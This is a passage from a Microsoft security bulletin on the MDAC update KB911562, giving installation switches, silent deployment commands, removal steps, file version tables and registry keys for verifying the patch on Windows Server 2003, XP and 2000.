Services, visit the Windows Server Update Services Web site. This security update will also be available through the Microsoft Update Web site.\r\n\r\nRestart Requirement\r\n\r\nThis update does not require a restart. The installer stops the required services, applies the update, and then restarts the services. However, if the required services cannot be stopped for any reason, or if required files are being used, this update will require a restart. If this behavior occurs, a message appears that advises you to restart.\r\n\r\nRemoval Information\r\n\r\nTo remove this update, use the Add or Remove Programs tool in Control Panel.\r\n\r\nSystem administrators can also use the Spuninst.exe utility to remove this security update. The Spuninst.exe utility is located in the %Windir%\$NTUninstallKB911562$\Spuninst folder.\r\nSupported Spuninst.exe Switches\r\nSwitch\tDescription\r\n\r\n/help\r\n\t\r\n\r\nDisplays the command-line options\r\nSetup Modes\t \r\n\r\n/passive\r\n\t\r\n\r\nUnattended Setup mode. No user interaction is required, but installation status is displayed. If a restart is required at the end of Setup, a dialog box will be presented to the user with a timer warning that the computer will restart in 30 seconds.\r\n\r\n/quiet\r\n\t\r\n\r\nQuiet mode. This is the same as unattended mode, but no status or error messages are displayed.\r\nRestart Options\t \r\n\r\n/norestart\r\n\t\r\n\r\nDoes not restart when installation has completed\r\n\r\n/forcerestart\r\n\t\r\n\r\nRestarts the computer after installation and force other applications to close at shutdown without saving open files first.\r\n\r\n/warnrestart[:x]\r\n\t\r\n\r\nPresents a dialog box with a timer warning the user that the computer will restart in x seconds. (The default setting is 30 seconds.) Intended for use with the /quiet switch or the /passive switch.\r\n\r\n/promptrestart\r\n\t\r\n\r\nDisplay a dialog box prompting the local user to allow a restart\r\nSpecial Options\t \r\n\r\n/forceappsclose\r\n\t\r\n\r\nForces other programs to close when the computer shuts down\r\n\r\n/log:path\r\n\t\r\n\r\nAllows the redirection of installation log files\r\n\r\nFile Information\r\n\r\nThe English version of this security update has the file attributes that are listed in the following table. The dates and times for these files are listed in coordinated universal time (UTC). When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the Time Zone tab in the Date and Time tool in Control Panel.\r\n\r\nWindows Server 2003, Web Edition; Windows Server 2003, Standard Edition; Windows Server 2003, Datacenter Edition; Windows Server 2003, Enterprise Edition; Windows Small Business Server 2003; Windows Server 2003, Web Edition with SP1; Windows Server 2003, Standard Edition with SP1; Windows Server 2003, Enterprise Edition with SP1; and Windows Server 2003, Datacenter Edition with SP1;. ; Windows Server 2003 R2, Web Edition; Windows Server 2003 R2, Standard Edition; Windows Server 2003 R2, Datacenter Edition; Windows Server 2003 R2, Enterprise Edition; Windows Small Business Server 2003 R2:\r\nFile Name\tVersion\tDate\tTime\tSize\tCPU\tFolder\r\n\r\nMsadco.dll\r\n\t\r\n\r\n2.80.1062.0\r\n\t\r\n\r\n22-Feb-2006\r\n\t\r\n\r\n00:47\r\n\t\r\n\r\n135,168\r\n\t\r\n\r\nx86\r\n\t\r\n\r\nRTMGDR\r\n\r\nMsadco.dll\r\n\t\r\n\r\n2.80.1062.0\r\n\t\r\n\r\n22-Feb-2006\r\n\t\r\n\r\n01:17\r\n\t\r\n\r\n135,168\r\n\t\r\n\r\nx86\r\n\t\r\n\r\nRTMQFE\r\n\r\nMsadco.dll\r\n\t\r\n\r\n2.82.2644.0\r\n\t\r\n\r\n22-Feb-2006\r\n\t\r\n\r\n20:52\r\n\t\r\n\r\n147,456\r\n\t\r\n\r\nx86\r\n\t\r\n\r\nSP1GDR\r\n\r\nMsadco.dll\r\n\t\r\n\r\n2.82.2644.0\r\n\t\r\n\r\n22-Feb-2006\r\n\t\r\n\r\n20:47\r\n\t\r\n\r\n147,456\r\n\t\r\n\r\nx86\r\n\t\r\n\r\nSP1QFE\r\n\r\nWindows Server, 2003 Enterprise Edition for Itanium-based Systems; Windows Server 2003, Datacenter Edition for Itanium-based Systems; Windows Server 2003, Enterprise Edition with SP1 for Itanium-based Systems; and Windows Server 2003, Datacenter Edition with SP1 for Itanium-based Systems:\r\nFile Name\tVersion\tDate\tTime\tSize\tCPU\tFolder\r\n\r\nMsadco.dll\r\n\t\r\n\r\n2.80.1062.0\r\n\t\r\n\r\n22-Feb-2006\r\n\t\r\n\r\n21:14\r\n\t\r\n\r\n434,176\r\n\t\r\n\r\nIA-64\r\n\t\r\n\r\nRTMGDR\r\n\r\nWmsadco.dll\r\n\t\r\n\r\n2.80.1062.0\r\n\t\r\n\r\n22-Feb-2006\r\n\t\r\n\r\n21:14\r\n\t\r\n\r\n135,168\r\n\t\r\n\r\nx86\r\n\t\r\n\r\nRTMGDR\WOW\r\n\r\nMsadco.dll\r\n\t\r\n\r\n2.80.1062.0\r\n\t\r\n\r\n22-Feb-2006\r\n\t\r\n\r\n21:14\r\n\t\r\n\r\n434,176\r\n\t\r\n\r\nIA-64\r\n\t\r\n\r\nRTMQFE\r\n\r\nWmsadco.dll\r\n\t\r\n\r\n2.80.1062.0\r\n\t\r\n\r\n22-Feb-2006\r\n\t\r\n\r\n21:14\r\n\t\r\n\r\n135,168\r\n\t\r\n\r\nx86\r\n\t\r\n\r\nRTMQFE\WOW\r\n\r\nMsadco.dll\r\n\t\r\n\r\n2.82.2644.0\r\n\t\r\n\r\n22-Feb-2006\r\n\t\r\n\r\n21:20\r\n\t\r\n\r\n483,328\r\n\t\r\n\r\nIA-64\r\n\t\r\n\r\nSP1GDR\r\n\r\nWmsadco.dll\r\n\t\r\n\r\n2.82.2644.0\r\n\t\r\n\r\n22-Feb-2006\r\n\t\r\n\r\n21:20\r\n\t\r\n\r\n147,456\r\n\t\r\n\r\nx86\r\n\t\r\n\r\nSP1GDR\WOW\r\n\r\nMsadco.dll\r\n\t\r\n\r\n2.82.2644.0\r\n\t\r\n\r\n22-Feb-2006\r\n\t\r\n\r\n21:14\r\n\t\r\n\r\n483,328\r\n\t\r\n\r\nIA-64\r\n\t\r\n\r\nSP1QFE\r\n\r\nWmsadco.dll\r\n\t\r\n\r\n2.82.2644.0\r\n\t\r\n\r\n22-Feb-2006\r\n\t\r\n\r\n21:14\r\n\t\r\n\r\n147,456\r\n\t\r\n\r\nx86\r\n\t\r\n\r\nSP1QFE\WOW\r\n\r\nWindows Server 2003, Standard x64 Edition; Windows Server 2003, Enterprise x64 Edition; and Windows Server 2003, Datacenter x64 Edition:\r\nFile Name\tVersion\tDate\tTime\tSize\tCPU\tFolder\r\n\r\nMsadco.dll\r\n\t\r\n\r\n2.82.2644.0\r\n\t\r\n\r\n22-Feb-2006\r\n\t\r\n\r\n21:18\r\n\t\r\n\r\n233,472\r\n\t\r\n\r\nx64\r\n\t\r\n\r\nSP1GDR\r\n\r\nWmsadco.dll\r\n\t\r\n\r\n2.82.2644.0\r\n\t\r\n\r\n22-Feb-2006\r\n\t\r\n\r\n21:18\r\n\t\r\n\r\n147,456\r\n\t\r\n\r\nx86\r\n\t\r\n\r\nSP1GDR\WOW\r\n\r\nMsadco.dll\r\n\t\r\n\r\n2.82.2644.0\r\n\t\r\n\r\n22-Feb-2006\r\n\t\r\n\r\n21:14\r\n\t\r\n\r\n233,472\r\n\t\r\n\r\nx64\r\n\t\r\n\r\nSP1QFE\r\n\r\nWmsadco.dll\r\n\t\r\n\r\n2.82.2644.0\r\n\t\r\n\r\n22-Feb-2006\r\n\t\r\n\r\n21:14\r\n\t\r\n\r\n147,456\r\n\t\r\n\r\nx86\r\n\t\r\n\r\nSP1QFE\WOW\r\n\r\nNotes When you install these security updates, the installer checks to see if one or more of the files that are being updated on your system have previously been updated by a Microsoft hotfix.\r\n\r\nIf you have previously installed a hotfix to update one of these files, the installer copies the RTMQFE, SP1QFE, or SP2QFE files to your system. Otherwise, the installer copies the RTMGDR, SP1GDR, or SP2GDR files to your system. Security updates may not contain all variations of these files. For more information about this behavior, see Microsoft Knowledge Base Article 824994.\r\n\r\nFor more information about this behavior, see Microsoft Knowledge Base Article 824994.\r\n\r\nFor more information about the Update.exe installer, visit the Microsoft TechNet Web site.\r\n\r\nFor more information about the terminology that appears in this bulletin, such as hotfix, see Microsoft Knowledge Base Article 824684.\r\n\r\nVerifying that the Update Has Been Applied\r\n\u2022\t\r\n\r\nMicrosoft Baseline Security Analyzer\r\n\r\nTo verify that a security update has been applied to an affected system, you can use the Microsoft Baseline Security Analyzer (MBSA) tool. MBSA allows administrators to scan local and remote systems for missing security updates and for common security misconfigurations. For more information about MBSA, visit the Microsoft Baseline Security Analyzer Web site.\r\n\u2022\t\r\n\r\nFile Version Verification\r\n\r\nNote Because there are several versions of Microsoft Windows, the following steps may be different on your computer. If they are, see your product documentation to complete these steps.\r\n\r\n1.\r\n\t\r\n\r\nClick Start, and then click Search.\r\n\r\n2.\r\n\t\r\n\r\nIn the Search Results pane, click All files and folders under Search Companion.\r\n\r\n3.\r\n\t\r\n\r\nIn the All or part of the file name box, type a file name from the appropriate file information table, and then click Search.\r\n\r\n4.\r\n\t\r\n\r\nIn the list of files, right-click a file name from the appropriate file information table, and then click Properties.\r\n\r\nNote Depending on the version of the operating system or programs installed, some of the files that are listed in the file information table may not be installed.\r\n\r\n5.\r\n\t\r\n\r\nOn the Version tab, determine the version of the file that is installed on your computer by comparing it to the version that is documented in the appropriate file information table.\r\n\r\nNote Attributes other than the file version may change during installation. Comparing other file attributes to the information in the file information table is not a supported method of verifying that the update has been applied. Also, in certain cases, files may be renamed during installation. If the file or version information is not present, use one of the other available methods to verify update installation.\r\n\u2022\t\r\n\r\nRegistry Key Verification\r\n\r\nYou may also be able to verify the files that this security update has installed by reviewing the following registry keys.\r\n\r\nWindows Server 2003, Web Edition; Windows Server 2003, Standard Edition; Windows Server 2003, Enterprise Edition; Windows Server 2003, Datacenter Edition; Windows Small Business Server 2003; Windows Server 2003, Enterprise Edition for Itanium-based Systems; and Windows Server 2003, Datacenter Edition for Itanium-based Systems:\r\n\r\nHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows Server 2003\SP2\KB911562\Filelist\r\n\r\nWindows Server 2003, Web Edition; Windows Server 2003, Standard Edition; Windows Server 2003, Enterprise Edition; Windows Server 2003, Datacenter Edition; Windows Small Business Server 2003; Windows Server 2003, Web Edition with SP1; Windows Server 2003, Standard Edition with SP1; Windows Server 2003, Enterprise Edition with SP1; Windows Server 2003, Datacenter Edition with SP1, Windows Server 2003 R2, Web Edition; Windows Server 2003 R2, Standard Edition; Windows Server 2003 R2, Datacenter Edition; Windows Server 2003 R2, Enterprise Edition; Windows Small Business Server 2003 R2:\r\n\r\nHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows Server 2003\SP2\KB911562\Filelist\r\n\r\nNote This registry keys may not contain a complete list of installed files. Also, this registry keys may not be created correctly if an administrator or an OEM integrates or slipstreams the 911562 security update into the Windows installation source files.\r\nTop of sectionTop of section\r\n\t\r\nWindows XP (all versions)\r\n\r\nPrerequisites\r\nThis security update requires Microsoft Windows XP Service Pack 1 or a later version. For more information, see Microsoft Knowledge Base Article 322389.\r\n\r\nInclusion in Future Service Packs:\r\nThe update for this issue will be included in a future Service Pack or Update Rollup.\r\n\r\nInstallation Information\r\n\r\nThis security update supports the following setup switches.\r\nSupported Security Update Installation Switches\r\nSwitch\tDescription\r\n\r\n/help\r\n\t\r\n\r\nDisplays the command-line options\r\nSetup Modes\t \r\n\r\n/passive\r\n\t\r\n\r\nUnattended Setup mode. No user interaction is required, but installation status is displayed. If a restart is required at the end of Setup, a dialog box will be presented to the user with a timer warning that the computer will restart in 30 seconds.\r\n\r\n/quiet\r\n\t\r\n\r\nQuiet mode. This is the same as unattended mode, but no status or error messages are displayed.\r\nRestart Options\t \r\n\r\n/norestart\r\n\t\r\n\r\nDoes not restart when installation has completed\r\n\r\n/forcerestart\r\n\t\r\n\r\nRestarts the computer after installation and force other applications to close at shutdown without saving open files first.\r\n\r\n/warnrestart[:x]\r\n\t\r\n\r\nPresents a dialog box with a timer warning the user that the computer will restart in x seconds. (The default setting is 30 seconds.) Intended for use with the /quiet switch or the /passive switch.\r\n\r\n/promptrestart\r\n\t\r\n\r\nDisplay a dialog box prompting the local user to allow a restart\r\nSpecial Options\t \r\n\r\n/overwriteoem\r\n\t\r\n\r\nOverwrites OEM files without prompting\r\n\r\n/nobackup\r\n\t\r\n\r\nDoes not back up files needed for uninstall\r\n\r\n/forceappsclose\r\n\t\r\n\r\nForces other programs to close when the computer shuts down\r\n\r\n/log:path\r\n\t\r\n\r\nAllows the redirection of installation log files\r\n\r\n/integrate:path\r\n\t\r\n\r\nIntegrates the update into the Windows source files. These files are located at the path that is specified in the switch.\r\n\r\n/extract[:path]\r\n\t\r\n\r\nExtracts files without starting the Setup program\r\n\r\n/ER\r\n\t\r\n\r\nEnables extended error reporting\r\n\r\n/verbose\r\n\t\r\n\r\nEnables verbose logging. During installation, creates %Windir%\CabBuild.log. This log details the files that are copied. Using this switch may cause the installation to proceed more slowly.\r\n\r\nNote You can combine these switches into one command. For backward compatibility, the security update also supports the setup switches that the earlier version of the Setup program uses. For more information about the supported installation switches, see Microsoft Knowledge Base Article 262841. For more information about the Update.exe installer, visit the Microsoft TechNet Web site.\r\n\r\nDeployment Information\r\n\r\nNote If you are unsure of the version of MDAC you are running, install the Component Checker.\r\n\r\nTo install the security update without any user intervention, use the following command at a command prompt for Microsoft Windows XP:\r\n\r\nWindowsxp-kb911562-x86-enu /quiet\r\nor\r\nMDAC28-KB911562-x86-enu /quiet\r\n\r\nNote Use of the /quiet switch will suppress all messages. This includes suppressing failure messages. Administrators should use one of the supported methods to verify the installation was successful when they use the /quiet switch. Administrators should also review the following Windowsxp-kb911562-x86-XXX.log or MDAC28-KB911562-x86-XXX.log files for any failure messages when they use this switch.\r\n\r\nTo install the security update without forcing the system to restart, use the following command at a command prompt for Windows XP:\r\n\r\nWindowsxp-kb911562-x86-enu /norestart\r\nor\r\nMDAC28-KB911562-x86-enu / norestart\r\n\r\nFor information about how to deploy this security update by using Software Update Services, visit the Software Update Services Web site. For more information about how to deploy this security update using Windows Server Update Services, visit the Windows Server Update Services Web site. This security update will also be available through the Microsoft Update Web site.\r\n\r\nRestart Requirement\r\n\r\nThis update does not require a restart. The installer stops the required services, applies the update, and then restarts the services. However, if the required services cannot be stopped for any reason, or if required files are being used, this update will require a restart. If this behavior occurs, a message appears that advises you to restart.\r\n\r\nRemoval Information\r\n\r\nTo remove this security update, use the Add or Remove Programs tool in Control Panel.\r\n\r\nSystem administrators can also use the Spuninst.exe utility to remove this security update. The Spuninst.exe utility is located in the %Windir%\$NTUninstallKB911562$\Spuninst folder.\r\nSupported Spuninst.exe Switches\r\nSwitch\tDescription\r\n\r\n/help\r\n\t\r\n\r\nDisplays the command-line options\r\nSetup Modes\t \r\n\r\n/passive\r\n\t\r\n\r\nUnattended Setup mode. No user interaction is required, but installation status is displayed. If a restart is required at the end of Setup, a dialog box will be presented to the user with a timer warning that the computer will restart in 30 seconds.\r\n\r\n/quiet\r\n\t\r\n\r\nQuiet mode. This is the same as unattended mode, but no status or error messages are displayed.\r\nRestart Options\t \r\n\r\n/norestart\r\n\t\r\n\r\nDoes not restart when installation has completed\r\n\r\n/forcerestart\r\n\t\r\n\r\nRestarts the computer after installation and force other applications to close at shutdown without saving open files first.\r\n\r\n/warnrestart[:x]\r\n\t\r\n\r\nPresents a dialog box with a timer warning the user that the computer will restart in x seconds. (The default setting is 30 seconds.) Intended for use with the /quiet switch or the /passive switch.\r\n\r\n/promptrestart\r\n\t\r\n\r\nDisplay a dialog box prompting the local user to allow a restart\r\nSpecial Options\t \r\n\r\n/forceappsclose\r\n\t\r\n\r\nForces other programs to close when the computer shuts down\r\n\r\n/log:path\r\n\t\r\n\r\nAllows the redirection of installation log files\r\n\r\nFile Information\r\n\r\nThe English version of this security update has the file attributes that are listed in the following table. The dates and times for these files are listed in coordinated universal time (UTC). When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the Time Zone tab in the Date and Time tool in Control Panel.\r\n\r\nWindows XP Home Edition Service Pack 1, Windows XP Professional Service Pack 1, Windows XP Tablet PC Edition, Windows XP Media Center Edition, Windows XP Home Edition Service Pack 2, Windows XP Professional Service Pack 2, Windows XP Tablet PC Edition 2005, and Windows XP Media Center Edition 2005:\r\nFile Name\tVersion\tDate\tTime\tSize\tCPU\tFolder\r\n\r\nMsadco.dll\r\n\t\r\n\r\n2.71.9053.0\r\n\t\r\n\r\n25-Feb-2006\r\n\t\r\n\r\n01:14\r\n\t\r\n\r\n135,168\r\n\t\r\n\r\nx86\r\n\t\r\n\r\nSP1QFE\r\n\r\nMsadco.dll\r\n\t\r\n\r\n2.81.1124.0\r\n\t\r\n\r\n25-Feb-2006\r\n\t\r\n\r\n01:05\r\n\t\r\n\r\n143,360\r\n\t\r\n\r\nx86\r\n\t\r\n\r\nSP2GDR\r\n\r\nMsadco.dll\r\n\t\r\n\r\n2.81.1124.0\r\n\t\r\n\r\n25-Feb-2006\r\n\t\r\n\r\n01:03\r\n\t\r\n\r\n143,360\r\n\t\r\n\r\nx86\r\n\t\r\n\r\nSP2QFE\r\n\r\nWindows XP Professional x64:\r\nFile Name\tVersion\tDate\tTime\tSize\tCPU\tFolder\r\n\r\nMsadco.dll\r\n\t\r\n\r\n2.82.2644.0\r\n\t\r\n\r\n22-Feb-2006\r\n\t\r\n\r\n21:18\r\n\t\r\n\r\n233,472\r\n\t\r\n\r\nx64\r\n\t\r\n\r\nSP1GDR\r\n\r\nWmsadco.dll\r\n\t\r\n\r\n2.82.2644.0\r\n\t\r\n\r\n22-Feb-2006\r\n\t\r\n\r\n21:18\r\n\t\r\n\r\n147,456\r\n\t\r\n\r\nx86\r\n\t\r\n\r\nSP1GDR\WOW\r\n\r\nMsadco.dll\r\n\t\r\n\r\n2.82.2644.0\r\n\t\r\n\r\n22-Feb-2006\r\n\t\r\n\r\n21:14\r\n\t\r\n\r\n233,472\r\n\t\r\n\r\nx64\r\n\t\r\n\r\nSP1QFE\r\n\r\nWmsadco.dll\r\n\t\r\n\r\n2.82.2644.0\r\n\t\r\n\r\n22-Feb-2006\r\n\t\r\n\r\n21:14\r\n\t\r\n\r\n147,456\r\n\t\r\n\r\nx86\r\n\t\r\n\r\nSP1QFE\WOW\r\n\r\nNotes When you install these security updates, the installer checks to see if one or more of the files that are being updated on your system have previously been updated by a Microsoft hotfix.\r\n\r\nIf you have previously installed a hotfix to update one of these files, the installer copies the RTMQFE, SP1QFE, or SP2QFE files to your system. Otherwise, the installer copies the RTMGDR, SP1GDR, or SP2GDR files to your system. Security updates may not contain all variations of these files. For more information about this behavior, see Microsoft Knowledge Base Article 824994.\r\n\r\nFor more information about the Update.exe installer, visit the Microsoft TechNet Web site.\r\n\r\nFor more information about the terminology that appears in this bulletin, such as hotfix, see Microsoft Knowledge Base Article 824684.\r\n\r\nVerifying that the Update Has Been Applied\r\n\u2022\t\r\n\r\nMicrosoft Baseline Security Analyzer\r\n\r\nTo verify that a security update has been applied to an affected system, you can use the Microsoft Baseline Security Analyzer (MBSA) tool. MBSA allows administrators to scan local and remote systems for missing security updates and for common security misconfigurations. For more information about MBSA, visit the Microsoft Baseline Security Analyzer Web site.\r\n\u2022\t\r\n\r\nFile Version Verification\r\n\r\nNote Because there are several versions of Microsoft Windows, the following steps may be different on your computer. If they are, see your product documentation to complete these steps.\r\n\r\n1.\r\n\t\r\n\r\nClick Start, and then click Search.\r\n\r\n2.\r\n\t\r\n\r\nIn the Search Results pane, click All files and folders under Search Companion.\r\n\r\n3.\r\n\t\r\n\r\nIn the All or part of the file name box, type a file name from the appropriate file information table, and then click Search.\r\n\r\n4.\r\n\t\r\n\r\nIn the list of files, right-click a file name from the appropriate file information table, and then click Properties.\r\n\r\nNote Depending on the version of the operating system or programs installed, some of the files that are listed in the file information table may not be installed.\r\n\r\n5.\r\n\t\r\n\r\nOn the Version tab, determine the version of the file that is installed on your computer by comparing it to the version that is documented in the appropriate file information table.\r\n\r\nNote Attributes other than the file version may change during installation. Comparing other file attributes to the information in the file information table is not a supported method of verifying that the update has been applied. Also, in certain cases, files may be renamed during installation. If the file or version information is not present, use one of the other available methods to verify update installation.\r\n\u2022\t\r\n\r\nRegistry Key Verification\r\n\r\nYou may also be able to verify the files that this security update has installed by reviewing the following registry keys.\r\n\r\nFor Windows XP Home Edition Service Pack 1, Windows XP Professional Service Pack 1, Windows XP Tablet PC Edition, Windows XP Media Center Edition:\r\n\r\nHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows XP\SP3\KB911562\Filelist\r\n\r\nWindows XP Home Edition Service Pack 2, Windows XP Professional Service Pack 2, Windows XP Tablet PC Edition 2005, and Windows XP Media Center Edition 2005:\r\n\r\nHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows XP\SP3\KB911562\Filelist\r\n\r\nFor Windows XP Professional x64 Edition:\r\n\r\nHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows XP Version 2003\SP2\ KB911562Filelist\r\n\r\nNote These registry keys may not contain a complete list of installed files. Also, these registry keys may not be created correctly if an administrator or an OEM integrates or slipstreams the 911562 security update into the Windows installation source files.\r\nTop of sectionTop of section\r\n\t\r\nMicrosoft Data Access Components When Installed on Windows 2000 (all versions)\r\n\r\nPrerequisites\r\nFor Windows 2000, this security update requires Service Pack 4 (SP4). For Small Business Server 2000, this security update requires Small Business Server 2000 Service Pack 1a (SP1a) or Small Business Server 2000 running with Windows 2000 Server Service Pack 4 (SP4).\r\n\r\nThe software that is listed has been tested to determine whether the versions are affected. Other versions either no longer include security update support or may not be affected. To determine the support life cycle for your product and version, visit the Microsoft Support Lifecycle Web site.\r\n\r\nFor more information about how to obtain the latest service pack, see Microsoft Knowledge Base Article 260910.\r\n\r\nInclusion in Future Service Packs:\r\nThe update for this issue may be included in a future Update Rollup.\r\n\r\nInstallation Information\r\n\r\nThis security update supports the following setup switches.\r\nSupported Security Update Installation Switches\r\nSwitch\tDescription\r\n\r\n/help\r\n\t\r\n\r\nDisplays the command-line options\r\nSetup Modes\t \r\n\r\n/passive\r\n\t\r\n\r\nUnattended Setup mode. No user interaction is required, but installation status is displayed. If a restart is required at the end of Setup, a dialog box will be presented to the user with a timer warning that the computer will restart in 30 seconds.\r\n\r\n/quiet\r\n\t\r\n\r\nQuiet mode. This is the same as unattended mode, but no status or error messages are displayed.\r\nRestart Options\t \r\n\r\n/norestart\r\n\t\r\n\r\nDoes not restart when installation has completed\r\n\r\n/forcerestart\r\n\t\r\n\r\nRestarts the computer after installation and force other applications to close at shutdown without saving open files first.\r\n\r\n/warnrestart[:x]\r\n\t\r\n\r\nPresents a dialog box with a timer warning the user that the computer will restart in x seconds. (The default setting is 30 seconds.) Intended for use with the /quiet switch or the /passive switch.\r\n\r\n/promptrestart\r\n\t\r\n\r\nDisplay a dialog box prompting the local user to allow a restart\r\nSpecial Options\t \r\n\r\n/overwriteoem\r\n\t\r\n\r\nOverwrites OEM files without prompting\r\n\r\n/nobackup\r\n\t\r\n\r\nDoes not back up files needed for uninstall\r\n\r\n/forceappsclose\r\n\t\r\n\r\nForces other programs to close when the computer shuts down\r\n\r\n/log:path\r\n\t\r\n\r\nAllows the redirection of installation log files\r\n\r\n/integrate:path\r\n\t\r\n\r\nIntegrates the update into the Windows source files. These files are located at the path that is specified in the switch.\r\n\r\n/extract[:path]\r\n\t\r\n\r\nExtracts files without starting the Setup program\r\n\r\n/ER\r\n\t\r\n\r\nEnables extended error reporting\r\n\r\n/verbose\r\n\t\r\n\r\nEnables verbose logging. During installation, creates %Windir%\CabBuild.log. This log details the files that are copied. Using this switch may cause the installation to proceed more slowly.\r\n\r\nNote You can combine these switches into one command. For backward compatibility, the security update also supports the setup switches that the earlier version of the Setup program uses. For more information about the supported installation switches, see Microsoft Knowledge Base Article 262841. For more information about the Update.exe installer, visit the Microsoft TechNet Web site. For more information about the terminology that appears in this bulletin, such as hotfix, see Microsoft Knowledge Base Article 824684.\r\n\r\nDeployment Information\r\n\r\nNote If you are unsure of the version of MDAC you are running, install the Component Checker.\r\n\r\nTo install the security update without any user intervention, use the following command at a command prompt for Windows 2000 Service Pack 4:\r\n\r\nMDAC253-KB911562-x86-enu /quiet\r\nor\r\nMDAC271-KB911562-x86-enu /quiet\r\nor\r\nMDAC28-KB911562-x86-enu /quiet\r\nor\r\nMDAC281-KB911562-x86-enu /quiet\r\n\r\nNote Use of the /quiet switch will suppress all messages. This includes suppressing failure messages. Administrators should use one of the supported methods to verify the installation was successful when they use the /quiet switch. Administrators should also review the MDAC253-KB911562-x86-XXX.log, MDAC271-KB911562-x86-XXX.log, MDAC28-KB911562-XXX.log or MDAC281-KB911562-XXX.log files for any failure messages when they use this switch.\r\n\r\nTo install the security update without forcing the system to restart, use the following command at a command prompt for Windows 2000 Service Pack 4:\r\n\r\nMDAC253-KB911562-x86-enu / norestart\r\nor\r\nMDAC271-KB911562-x86-enu / norestart\r\nor\r\nMDAC28-KB911562-x86-enu / norestart\r\nor\r\nMDAC281-KB911562-x86-enu / norestart\r\n\r\nFor more information about how to deploy this security update with Software Update Services, visit the Software Update Services Web site. For more information about how to deploy this security update using Windows Server Update Services, visit the Windows Server Update Services Web site. This security update will also be available through the Microsoft Update Web site.\r\n\r\nRestart Requirement\r\n\r\nThis update does not require a restart. The installer stops the required services, applies the update, and then restarts the services. However, if the required services cannot be stopped for any reason, or if required files are being used, this update will require a restart. If this behavior occurs, a message appears that advises you to restart.\r\n\r\nRemoval Information\r\n\r\nTo remove this security update, use the Add or Remove Programs tool in Control Panel.\r\n\r\nSystem administrators can also use the Spuninst.exe utility to remove this security update. The Spuninst.exe utility is located in the following; %Windir%\$SQLUninstallMDAC25SP3-KB911562-x86-XXX$\Spuninst, %Windir%\$SQLUninstallMDAC27SP1-KB911562-x86-XXX$\Spuninst, %Windir%\$SQLUninstallMDAC28-KB911562-x86-XXX$\Spuninst, or %Windir%\$SQLUninstallMDAC28SP1-KB911562-x86-XXX$\Spuninst\r\nSupported Spuninst.exe Switches\r\nSwitch\tDescription\r\n\r\n/help\r\n\t\r\n\r\nDisplays the command-line options\r\nSetup Modes\t \r\n\r\n/passive\r\n\t\r\n\r\nUnattended Setup mode. No user interaction is required, but installation status is displayed. If a restart is required at the end of Setup, a dialog box will be presented to the user with a timer warning that the computer will restart in 30 seconds.\r\n\r\n/quiet\r\n\t\r\n\r\nQuiet mode. This is the same as unattended mode, but no status or error messages are displayed.\r\nRestart Options\t \r\n\r\n/norestart\r\n\t\r\n\r\nDoes not restart when installation has completed\r\n\r\n/forcerestart\r\n\t\r\n\r\nRestarts the computer after installation and force other applications to close at shutdown without saving open files first.\r\n\r\n/warnrestart[:x]\r\n\t\r\n\r\nPresents a dialog box with a timer warning the user that the computer will restart in x seconds. (The default setting is 30 seconds.) Intended for use with the /quiet switch or the /passive switch.\r\n\r\n/promptrestart\r\n\t\r\n\r\nDisplay a dialog box prompting the local user to allow a restart\r\nSpecial Options\t \r\n\r\n/forceappsclose\r\n\t\r\n\r\nForces other programs to close when the computer shuts down\r\n\r\n/log:path\r\n\t\r\n\r\nAllows the redirection of installation log files\r\n\r\nFile Information\r\n\r\nThe English version of this security update has the file attributes that are listed in the following table. The dates and times for these files are listed in coordinated universal time (UTC). When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the Time Zone tab in the Date and Time tool in Control Panel.\r\n\r\nMicrosoft Data Access Components 2.5 Service Pack 3:\r\nFile Name\tVersion\tDate\tTime\tSize\tCPU\r\n\r\nSprecovr.exe\r\n\t\r\n\r\n6.2.29.0\r\n\t\r\n\r\n17-Feb-2006\r\n\t\r\n\r\n23:05\r\n\t\r\n\r\n29,408\r\n\t\r\n\r\nx86\r\n\r\nSpupdsvc.exe\r\n\t\r\n\r\n6.2.29.0\r\n\t\r\n\r\n17-Feb-2006\r\n\t\r\n\r\n23:05\r\n\t\r\n\r\n22,752\r\n\t\r\n\r\nx86\r\n\r\nMsadce.dll\r\n\t\r\n\r\n2.53.6306.0\r\n\t\r\n\r\n21-Feb-2006\r\n\t\r\n\r\n19:57\r\n\t\r\n\r\n327,680\r\n\t\r\n\r\nx86\r\n\r\nMsadco.dll\r\n\t\r\n\r\n2.53.6306.0\r\n\t\r\n\r\n21-Feb-2006\r\n\t\r\n\r\n17:58\r\n\t\r\n\r\n151,824\r\n\t\r\n\r\nx86\r\n\r\nMsadcs.dll\r\n\t\r\n\r\n2.53.6306.0\r\n\t\r\n\r\n21-Feb-2006\r\n\t\r\n\r\n17:58\r\n\t\r\n\r\n57,616\r\n\t\r\n\r\nx86\r\n\r\nMsado15.dll\r\n\t\r\n\r\n2.53.6306.0\r\n\t\r\n\r\n21-Feb-2006\r\n\t\r\n\r\n19:57\r\n\t\r\n\r\n487,424\r\n\t\r\n\r\nx86\r\n\r\nMsdaprst.dll\r\n\t\r\n\r\n2.53.6306.0\r\n\t\r\n\r\n21-Feb-2006\r\n\t\r\n\r\n19:57\r\n\t\r\n\r\n204,800\r\n\t\r\n\r\nx86\r\n\r\nMsdaps.dll\r\n\t\r\n\r\n2.53.6306.0\r\n\t\r\n\r\n21-Feb-2006\r\n\t\r\n\r\n17:58\r\n\t\r\n\r\n192,784\r\n\t\r\n\r\nx86\r\n\r\nOdbc32.dll\r\n\t\r\n\r\n3.520.6306.0\r\n\t\r\n\r\n21-Feb-2006\r\n\t\r\n\r\n19:57\r\n\t\r\n\r\n212,992\r\n\t\r\n\r\nx86\r\n\r\nOdbcbcp.dll\r\n\t\r\n\r\n3.70.11.46\r\n\t\r\n\r\n28-Oct-2003\r\n\t\r\n\r\n21:44\r\n\t\r\n\r\n24,848\r\n\t\r\n\r\nx86\r\n\r\nOdbccp32.dll\r\n\t\r\n\r\n3.520.6306.0\r\n\t\r\n\r\n21-Feb-2006\r\n\t\r\n\r\n17:58\r\n\t\r\n\r\n102,672\r\n\t\r\n\r\nx86\r\n\r\nOdbcji32.dll\r\n\t\r\n\r\n4.0.6306.